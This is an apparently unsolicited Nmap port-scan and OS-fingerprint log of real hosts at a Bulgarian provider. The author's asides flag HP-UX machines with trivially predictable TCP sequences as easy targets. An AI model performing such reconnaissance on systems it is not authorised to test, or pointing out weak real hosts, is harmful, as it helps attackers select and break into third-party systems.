Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 29 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 31502 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.4):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=54481 (Worthy challenge)

Sequence numbers: 6C2D17E 6DF23BC 6FCE594 7196BE2 7374C28 7530DFF
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=D4D1)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.65.5) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.5)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 13 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 37963 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.5):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=74713 (Worthy challenge)

Sequence numbers: 86905AA 874B195 882AAE1 88D6034 898B94F 8A56071
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=123D9)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.65.6) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.6)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 16 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 38632 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 38063 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.6):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=91434 (Worthy challenge)

Sequence numbers: AC0C685 AD28E4C AE8606D AFB34D6 B0FCD9A B2398F9
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=1652A)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.65.7) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.15) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.65.15) seems to be a subnet broadcast address (returned 1 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.65.16) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.65.16) seems to be a subnet broadcast address (returned 1 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.65.17) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.17)
The SYN scan took 11 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.65.17):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

Remote OS guesses: Cisco 7513/3640 Router (IOS 11.2(14)P),  Cisco 25XX/45XX Router or 29XX switch (IOS 11.2),  IBM Stackable Hub
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.65.18) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.18)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 16 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 41288 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 34587 is closed and neither are firewalled
For OSScan assuming that port 23 is open and port 34911 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.18):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=153366 (Good luck!)

Sequence numbers: FB1FF29 FC0B97D FC9B3C6 FD7F6C8 FE4AF65 FEE6762
No OS matches for this host.  TCP fingerprints:
TSeq(Class=RI%gcd=1%SI=949E2)
TSeq(Class=RI%gcd=1%SI=2189D)
TSeq(Class=RI%gcd=1%SI=25716)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=O%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.65.19) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.19)
Adding TCP port 23 (state Open).
Adding TCP port 79 (state Open).
The SYN scan took 12 seconds to scan 120 ports.
For OSScan assuming that port 23 is open and port 42662 is closed and neither are firewalled
Interesting ports on unnamed.infotel.bg (212.39.65.19):
Port    State       Protocol  Service
21      filtered    tcp        ftp
23      open        tcp        telnet
49      filtered    tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=87562 (Worthy challenge)

Sequence numbers: 10D0192D 10D9FE57 10E56649 10EF2A8F 10FC1FA3 110579DE
Remote operating system guess: Cisco 25XX/45XX Router or 29XX switch (IOS 11.2)
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=1560A)
T1(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=N%W=10C0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host unnamed.infotel.bg (212.39.65.20) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.31) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.65.31) seems to be a subnet broadcast address (returned 2 extra pings).  Skipping host.
Host unnamed.infotel.bg (212.39.65.32) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.72) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.72)
The SYN scan took 398 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.65.72):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.65.73) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.113) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.113)
The SYN scan took 398 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on unnamed.infotel.bg (212.39.65.113):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host unnamed.infotel.bg (212.39.65.114) appears to be down, skipping it.
Host pppsof1.infotel.bg (212.39.65.129) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof1.infotel.bg (212.39.65.129)
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
The SYN scan took 441 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof1.infotel.bg (212.39.65.129):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host pppsof2.infotel.bg (212.39.65.130) appears to be down, skipping it.
Host pppsof3.infotel.bg (212.39.65.131) appears to be down, skipping it.
Host pppsof4.infotel.bg (212.39.65.132) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof4.infotel.bg (212.39.65.132)
The SYN scan took 122 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof4.infotel.bg (212.39.65.132):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host pppsof5.infotel.bg (212.39.65.133) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof5.infotel.bg (212.39.65.133)
The SYN scan took 33 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof5.infotel.bg (212.39.65.133):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host pppsof6.infotel.bg (212.39.65.134) appears to be down, skipping it.
Host pppsof7.infotel.bg (212.39.65.135) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof7.infotel.bg (212.39.65.135)
The SYN scan took 316 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof7.infotel.bg (212.39.65.135):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host pppsof8.infotel.bg (212.39.65.136) appears to be down, skipping it.
Host pppsof9.infotel.bg (212.39.65.137) appears to be down, skipping it.
Host pppsof10.infotel.bg (212.39.65.138) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof10.infotel.bg (212.39.65.138)
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof10.infotel.bg (212.39.65.138):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host pppsof11.infotel.bg (212.39.65.139) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof11.infotel.bg (212.39.65.139)
The SYN scan took 78 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof11.infotel.bg (212.39.65.139):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

No OS matches for this host.  TCP fingerprints:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host pppsof12.infotel.bg (212.39.65.140) appears to be down, skipping it.
Host pppsof13.infotel.bg (212.39.65.141) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof13.infotel.bg (212.39.65.141)
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof13.infotel.bg (212.39.65.141):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host pppsof14.infotel.bg (212.39.65.142) appears to be down, skipping it.
Host pppsof15.infotel.bg (212.39.65.143) appears to be down, skipping it.
Host pppsof16.infotel.bg (212.39.65.144) appears to be down, skipping it.
Host pppsof17.infotel.bg (212.39.65.145) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof17.infotel.bg (212.39.65.145)
Adding TCP port 59 (state Open).
Adding TCP port 79 (state Open).
Adding TCP port 113 (state Open).
The SYN scan took 19 seconds to scan 120 ports.
For OSScan assuming that port 59 is open and port 33587 is closed and neither are firewalled
Interesting ports on pppsof17.infotel.bg (212.39.65.145):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
59      open        tcp        unknown
79      open        tcp        finger
80      filtered    tcp        www
111     filtered    tcp        sunrpc
113     open        tcp        auth

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=476 (Medium)

Sequence numbers: 753694 753AE5 753D62 7540FA 754876
Remote operating system guess: Windows NT4 / Win95 / Win98
OS Fingerprint:
TSeq(Class=RI%gcd=1%SI=1DC)
T1(Resp=Y%DF=Y%W=16D0%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=16D0%ACK=S++%Flags=AS%Ops=M)
T4(Resp=N)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host pppsof18.infotel.bg (212.39.65.146) appears to be down, skipping it.
Host pppsof19.infotel.bg (212.39.65.147) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof19.infotel.bg (212.39.65.147)
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof19.infotel.bg (212.39.65.147):
(Not showing ports in state: filtered)
Port    State       Protocol  Service

No OS matches for this host.  TCP fingerprints:
T5(Resp=N)
T6(Resp=N)
T7(Resp=N)
PU(Resp=N)


Host pppsof20.infotel.bg (212.39.65.148) appears to be down, skipping it.
Host pppsof27.infotel.bg (212.39.65.155) appears to be down, skipping it.
Host pppsof28.infotel.bg (212.39.65.156) appears to be up ... good.
Initiating SYN half-open stealth scan against pppsof28.infotel.bg (212.39.65.156)
The SYN scan took 16 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Interesting ports on pppsof28.infotel.bg (212.39.65.156):
Port    State       Protocol  Service
21      filtered    tcp        ftp
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc

Remote OS guesses: Windows NT4 / Win95 / Win98, Windows NT 5 Beta2
OS Fingerprint:
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=S++%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)


Host pppsof29.infotel.bg (212.39.65.157) appears to be down, skipping it.
Host pppsof30.infotel.bg (212.39.65.158) appears to be down, skipping it.
Host unnamed.infotel.bg (212.39.65.159) appears to be down, skipping it.
Host  unnamed.infotel.bg (212.39.65.192) seems to be a subnet broadcast address (returned 2 extra pings).  Skipping host.
Host fpn.infotel.bg (212.39.65.193) appears to be up ... good.
Initiating SYN half-open stealth scan against fpn.infotel.bg (212.39.65.193)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 53 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 37 (state Open).
Adding TCP port 23 (state Open).
Adding TCP port 119 (state Open).
Adding TCP port 79 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 110 (state Open).
Adding TCP port 113 (state Open).
The SYN scan took 19 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 44655 is closed and neither are firewalled
Interesting ports on fpn.infotel.bg (212.39.65.193):
Port    State       Protocol  Service
7       open        tcp        echo
9       open        tcp        discard
13      open        tcp        daytime
19      open        tcp        chargen
21      filtered    tcp        ftp
23      open        tcp        telnet
25      open        tcp        smtp
37      open        tcp        time
49      filtered    tcp        unknown
53      open        tcp        domain
79      open        tcp        finger
80      filtered    tcp        www
110     open        tcp        pop3
111     filtered    tcp        sunrpc
113     open        tcp        auth
119     open        tcp        nntp

TCP Sequence Prediction: Class=64K rule
                         Difficulty=1 (Trivial joke)

Sequence numbers: 50641400 50650E00 50660800 5067FC00 5069F000
Remote operating system guess: HP-UX 10.20 E 9000/777 or A 712/60 with tcp_random_seq = 0
OS Fingerprint:
TSeq(Class=64K)
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)

 <[ :))) just sits there waiting for someone to screw with it ..... ]>

Host unnamed.infotel.bg (212.39.65.194) appears to be down, skipping it.
Host db.infotel.bg (212.39.65.195) appears to be up ... good.
Initiating SYN half-open stealth scan against db.infotel.bg (212.39.65.195)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 23 (state Open).
Adding TCP port 37 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 113 (state Open).
The SYN scan took 13 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 35861 is closed and neither are firewalled
For OSScan assuming that port 7 is open and port 42889 is closed and neither are firewalled
Interesting ports on db.infotel.bg (212.39.65.195):
Port    State       Protocol  Service
7       open        tcp        echo
9       open        tcp        discard
13      open        tcp        daytime
19      open        tcp        chargen
21      filtered    tcp        ftp
23      open        tcp        telnet
25      open        tcp        smtp
37      open        tcp        time
49      filtered    tcp        unknown
80      filtered    tcp        www
111     filtered    tcp        sunrpc
113     open        tcp        auth

TCP Sequence Prediction: Class=64K rule
                         Difficulty=1 (Trivial joke)

Sequence numbers: 54185201 54194C01 541A4601 541B4001 541C3A01 541D3401
Remote operating system guess: HP-UX 10.20 E 9000/777 or A 712/60 with tcp_random_seq = 0
OS Fingerprint:
TSeq(Class=64K)
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)

 <[ and here there may be a lot of interesting little things ... ]>

Host www1.infotel.bg (212.39.65.196) appears to be up ... good.
Initiating SYN half-open stealth scan against www1.infotel.bg (212.39.65.196)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 53 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 23 (state Open).
Adding TCP port 37 (state Open).
Adding TCP port 79 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 110 (state Open).
The SYN scan took 22 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 35473 is closed and neither are firewalled
Interesting ports on www1.infotel.bg (212.39.65.196):
Port    State       Protocol  Service
7       open        tcp        echo
9       open        tcp        discard
13      open        tcp        daytime
19      open        tcp        chargen
21      filtered    tcp        ftp
23      open        tcp        telnet
25      open        tcp        smtp
37      open        tcp        time
49      filtered    tcp        unknown
53      open        tcp        domain
79      open        tcp        finger
80      filtered    tcp        www
110     open        tcp        pop3
111     filtered    tcp        sunrpc

TCP Sequence Prediction: Class=64K rule
                         Difficulty=1 (Trivial joke)

Sequence numbers: 136F9600 13709000 13718A00 13728400 13737E00 13757200
Remote operating system guess: HP-UX 10.20 E 9000/777 or A 712/60 with tcp_random_seq = 0
OS Fingerprint:
TSeq(Class=64K)
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)


Host hdesk.gurko.cits.btc.bg (212.39.65.197) appears to be up ... good.
Initiating SYN half-open stealth scan against hdesk.gurko.cits.btc.bg (212.39.65.197)
Adding TCP port 9 (state Open).
Adding TCP port 13 (state Open).
Adding TCP port 53 (state Open).
Adding TCP port 25 (state Open).
Adding TCP port 7 (state Open).
Adding TCP port 23 (state Open).
Adding TCP port 37 (state Open).
Adding TCP port 19 (state Open).
Adding TCP port 113 (state Open).
The SYN scan took 11 seconds to scan 120 ports.
For OSScan assuming that port 7 is open and port 36042 is closed and neither are firewalled
Insufficient responses for TCP sequencing (3), OS detection will be MUCH less reliable
Interesting ports on hdesk.gurko.cits.btc.bg (212.39.65.197):
Port    State       Protocol  Service
7       open        tcp        echo
9       open        tcp        discard
13      open        tcp        daytime
19      open        tcp        chargen
21      filtered    tcp        ftp
23      open        tcp        telnet
25      open        tcp        smtp
37      open        tcp        time
49      filtered    tcp        unknown
53      open        tcp        domain
80      filtered    tcp        www
111     filtered    tcp        sunrpc
113     open        tcp        auth

Remote OS guesses: HP-UX 10.20 E 9000/777 or A 712/60 with tcp_random_seq = 0, HP-UX 10.20
OS Fingerprint:
T1(Resp=Y%DF=Y%W=8000%ACK=S++%Flags=AS%Ops=M)
T2(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
T3(Resp=Y%DF=Y%W=8000%ACK=O%Flags=A%Ops=)
T4(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=N%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=N%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=N%W=0%ACK=S%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=0%IPLEN=38%RIPTL=148%RID=E%RIPCK=0%UCK=E%ULEN=134%DAT=E)

 <[  Hdesk?  Sounds  like  HelpDesk  ...gurko.cits  sounds like where it is
 located ...has anyone been to CITS on Gurko St.? :) ]>

Host unnamed.infotel.bg (212.39.65.198) appears to be up ... good.
Initiating SYN half-open stealth scan against unnamed.infotel.bg (212.39.65.198)
Here it is:
3  4  13 1    0  0  0  0    45 0  1  52   1  28 40 0
3F 6  69 B4   C2 C  EB C1   C2 8D 19 C1   66 FE C  38
59 B6 1D E
Here it is:
3  4  13 1    0  0  0  0    45 0  1  52   1  28 40 0
3F 6  69 80   C2 C  EB C1   C2 8D 19 C1   66 FE C  38
59 B6 1D E
The SYN scan took 397 seconds to scan 120 ports.
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
Warning:  No ports found open on this machine, OS detection will be MUCH less reliable
